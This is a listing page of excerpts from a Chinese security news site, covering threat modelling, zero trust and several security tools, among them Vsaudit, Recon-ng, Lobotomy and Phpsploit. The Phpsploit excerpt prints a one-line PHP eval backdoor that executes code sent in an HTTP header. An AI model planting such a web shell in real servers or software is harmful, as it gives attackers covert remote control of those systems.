记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

威胁建模的主流框架、工具与最佳实践

了解威胁建模框架、方法和工具可以帮你更好地识别、量化和排序面临的威胁。威胁建模是一个结构化的过程,IT专业人员可以通过该过程识别潜在的安全威胁和漏洞,量化每个威胁的严重性,并确定技术的优先级以缓解攻击并保护IT资产。这个宽泛的定义听起来可能像是网络安全专业人员的职位描述,但是威胁模型的重要之处在于它是系统的和结构化的。威胁建模人员将执行一系列具体步骤,以全面了解他们试图保护的IT环境,识别漏洞和潜在攻击者。总的来说,威胁建模在某种程度上仍然是科学和艺术的综合体,并没有单一的威胁建模过程规范。威胁建模的实践借鉴了各种早期的安全实践,最著名的是1990年代开发的“ 攻击树 ” 的概念。1999年,Microsoft员工Loren Kohnfelder和Praerit Garg在公司内部分发了一份名为“ 我们产品的威
发布时间:2020-04-21 19:31 | 阅读:33048 | 评论:0 | 标签:术有专攻 首页动态 威胁建模 工具 最佳实践 框架

建立零信任IT环境的5个步骤

零信任不是产品或服务,当然也不仅仅是流行语。相反,它是网络安全防御的一种特殊方法。顾名思义,不是“先验证,然后信任”,而是“永远不要信任,永远要验证”。 本质上,零信任是通过限制数据访问来保护数据。无论是否在网络范围之内,企业都不会自动信任任何人或任何事物。零信任方法要求在授予访问权限之前,对试图连接到企业的应用程序或系统的每个人、设备、帐户等进行验证。 然而,网络安全系统设计之初不是已有这个功能了吗?难道零信任只是在此基础上增加某些额外的控件? 的确,零信任框架包括许多企业广泛使用的数据保护技术。但是,零信任代表着一个清晰的支点,即如何思考网络安全防御。这种方法不仅可以保护整个企业,而且还可以将该范围扩大到组织内外的每个网络、系统、用户和设备。强大的身份、多因素身份验证、受信任的端
发布时间:2020-03-10 10:30 | 阅读:28581 | 评论:0 | 标签:网络安全 框架 零信任

Apollo框架可行性分析

Apollo(阿波罗)是携程框架部门研发的开源配置管理中心,能够集中化管理应用不同环境、不同集群的配置,配置修改后能够实时推送到应用端,并且具备规范的权限、流程治理等特性。本文意在测试apollo的高可用性与安全性。 一、测试目的 随着程序功能的日益复杂,程序的配置日益增多:各种功能的开关、参数的配置、服务器的地址…… 对程序配置的期望值也越来越高:配置修改后实时生效,灰度发布,分环境、分集群管理配置,完善的权限、审核机制…… 在这样的大环境下,传统的通过配置文件、数据库等方式已经越来越无法满足开发人员对配置管理的需求。 Apollo配置中心应运而生! 测试apollo的高可用性与安全性。 二、测试范围 本次测试包括以下几个方面: 针对配置
发布时间:2020-03-09 12:24 | 阅读:21915 | 评论:0 | 标签:企业安全 Apollo 开源 框架

Nfstream:一款易于扩展的网络数据分析框架

Nfstream本质上来说是一款Python包,它可以提供快速、灵活且有效的数据结构,支持针对在线或离线状态的网络数据进行分析,这种方式既简单又直观。在Nfstream的帮助下,广大研究人员可以直接在自己的Python代码中集成数据分析功能,并对真实场景下的实际网络数据进行分析。除此之外,Nfstream目前仍处于开发阶段,该项目将会为研究人员提供各种实验数据复现功能,并成为一款通用的网络数据处理与分析框架。 功能介绍 1、性能:Nfstream的运行速度非常快(集成pypy3后,速度将会快10倍),而且对CPU和内存的需求并不大; 2、七层可见度:Nfstream深度数据包检测引擎基于nDPI实现,它允许Nfstream执行可靠的加密应用识别与元数据提取(例如TLS,
发布时间:2020-02-18 15:05 | 阅读:32635 | 评论:0 | 标签:工具 Nfstream 数据分析 框架

Vsaudit:针对VOIP服务的安全审计框架

项目主页 https://github.com/sanvil/vsaudit 简介 Vsaudit是一个开源的对一般的VoIP服务进行攻击的工具,在收集阶段它可以扫描整个网络或者单一主机,然后在发现存活的主机时可以搜索已知的漏洞,并试图利用它们。 安装依赖 开始使用vsaudit必须安装’捆绑’包,将通过Gemfile安装需要的依赖。 直接从网站下载—下载地址 使用gem(ruby包管理)安装:deftcode vsaudit $ bundle 现在你可以开始使用vsaudit: deftcode vsaudit $ ruby vsaudit.rb 注意:如果gem报错,你需要安装libssl-dev包(kali-linux: apt install libssl-dev)。 环境命
发布时间:2016-10-10 21:50 | 阅读:119714 | 评论:0 | 标签:工具 VOIP服务 安全审计 框架

Rails动态模板路径的风险

前言 从安全开发的角度来看,Ruby on Rails是一套很友善的框架。它从框架层避免了很多过去网站长出现的安全问题。例如使用ORM避免大部分的SQL injection问题,有内建的authenticity_token让开发者不必特别烦恼CSRF,从机制面规定了开发者使用Strong Parameter来避免Mass Assignment,预设转化危险字符避免XSS等。 就我们从过去的渗透测试的经验来看,Rails网站虽然还是能找到问题,但相对问题较少,而且很少单纯因为Rails写法问题拿到系统权限。而今天要分享的,是一次渗透测试中比较特别的例子。因为开发者使用了动态模板路径(Dynamic Render Paths)的写法(注解1),最后造成了严重的结果。 动态模板路径,OWASP的介绍是这样的: In
发布时间:2016-09-20 21:35 | 阅读:137485 | 评论:0 | 标签:Web安全 csrf Rails动态模板 sql injection xss 框架 渗透测试 远程代码执行

Needle:iOS的安全性测试框架

项目地址: https://github.com/mwrlabs/needle 项目介绍: Needle是一个开源的模块化框架,主要简化iOS应用程序安全评估过程,并作为一个中心点。鉴于其模块化方法,Needle很容易扩展新模块,可以以Python脚本的形式加入。Needle针对的不仅是安全专家,也为开发者保护其代码没有安全漏洞。通过Needle覆盖测试区的几个例子包括:数据存储,进程间通信,网络通信,静态代码分析,HOOK和二进制保护。为了有效地运行Needle,需要越狱的设备。 安装 Kali: # Unix packages sudo apt-get install python2.7 python2.7-dev sshpass sqlite3 libimobiledevice4 libimobilede
发布时间:2016-09-03 01:25 | 阅读:156004 | 评论:0 | 标签:工具 iOS Needle 安全性测试 框架 测试框架

工具推荐:Recon-ng,WEB安全探测框架

Recon-ng是一个全面的web探测框架,它由python编写,有着独立的模块、数据库交互功能、交互式帮助提示和命令补全的特性。它提供了一个强大的开源web探测机制,帮助测试人员快速彻底地进行探测。Recon-ng框架简介Recon-ng的使用和模式与主流的metasploit框架有点类似,这减少了用户学习利用该框架的难度。当然,Recon-ng也有着自己的特点,其为基于web的开源探测工具。如果你想要进行exp利用,请使用metasploit框架。如果你想进行社工,请使用社工工具包。如果你想进行被动探测,请使用Recon-ng。至于主动检测工具的例子,大家可以看看谷歌安全团队的Skipfish。Recon-ng是一个完全模块化的框架,新的python开发者也能很容易地进行模块贡献。每一
发布时间:2016-04-21 02:45 | 阅读:204169 | 评论:0 | 标签:WEB安全 工具 Recon-ng web 安全 框架

AIL-Framework:潜在信息泄露分析框架

AIL是一个用于分析潜在的信息泄露的模块化框架,主要针对非结构化的数据资源,如Pastebin网站的粘贴数据等。AIL-Framework十分灵活,可以支持采集敏感数据的其他功能。图一 AIL-Framework截图展示图二 AIL-Framework截图展示功能处理结构化或非结构化数据流的模块结构 默认支持外部ZMQ feeds,例如CIRCL或其他供应商提供的feeds每个模块都可以再处理AIL已经处理过的数据检测和提取URL,包括地理位置(如IP地址)提取和验证潜在的信用卡号的泄露提取和验证邮箱地址泄露,包括DNS MX验证提取Tor的.onion地址(用于进一步分析)提取和验证潜在的域名全局索引模块用于索引非结构化信息多个用于提取电话号码、证书及其他信息的模块安装在命令行
发布时间:2016-02-19 05:15 | 阅读:126330 | 评论:0 | 标签:工具 AIL-Framework 信息泄露 框架

Lobotomy:Android逆向工程框架(Part2)

0×01 概述在第一部分中,我们讲解了如何将应用程序加载到Lobotomy中,以及Lobotomy的全局加载器整体上是如何工作的。在第二部分(本文)中,我们将介绍如何使用Lobotomy反编译APK,以及如何将不可调试的安卓应用转换成可调试的应用程序。0×02 APK反编译Lobotomy提供了一个Apktool独立构建的包装器,使用它来支持APK反编译。通过使用内置的帮助功能,我们可以了解到运行反编译模块都需要什么环境:现在,既然我们知道了所需要的条件,那么接下来我们就目标APK的路径加入到该模块中,剩下的事交给它就行:执行结果将保在Lobotomy的输出目录中:[~/Tools/android/lobotomy/output]> lsd2j 
发布时间:2016-01-14 15:25 | 阅读:143057 | 评论:0 | 标签:终端安全 APK Lobotomy 反编译 安卓安全 框架 逆向工程 Android

Phpsploit:隐蔽的Post-Exploitation框架

Phpsploit是一个远程控制框架,为客户端与服务器间提供shell交互连接。能够对Getshell的服务器进行管理实现权限提升。Phpsploit利用多形态后门通道使模糊化通信机制通过客户端请求和WEB服务端响应中的HTTP头实现:<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>特性:高效性:可使用20多款插件实现post-exploitation任务自动化  执行命令、浏览文件系统、绕过PHP安全限制;  在目标主机与客户端之间执行文件上传、下载操作;  通过本地编辑器来编辑远程主机上的文件;  在远程主机上运行数据库控制台;&
发布时间:2016-01-06 10:15 | 阅读:109912 | 评论:0 | 标签:工具 bypass Phpsploit 安全限制 框架 渗透测试 exp

IBatis.Net框架与SQL注入

Neeao's Blog ( http://neeao.com/ ) : 主要由于sqlmaps配置文件中符号$与#解析不同引起: 防止sql注入iBatis模糊查询 http://developer.51cto.com/art/200907/139144.htm iBatis解决sql注入 http://www.cnblogs.com/aaa6818162/archive/2011/05/21/2052759.html ibatis的sql注入,证实了我此前的想法 http://blog.csdn.net/oswin_jiang/article/details/4242431 关于I
发布时间:2013-01-07 20:04 | 阅读:114058 | 评论:0 | 标签:信息安全 框架 sql注入

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云